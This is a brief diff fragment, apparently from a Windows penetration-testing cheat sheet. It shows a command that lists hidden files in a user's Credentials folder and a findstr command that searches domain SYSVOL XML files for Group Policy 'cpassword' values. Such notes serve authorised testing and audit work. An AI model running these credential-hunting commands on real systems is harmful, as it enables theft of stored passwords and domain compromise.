Windows

 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

-Find GPP Passwords in SYSVOL:
+Find GPP Passwords in SYSVOL

 findstr /S cpassword $env:logonserver\sysvol\*.xml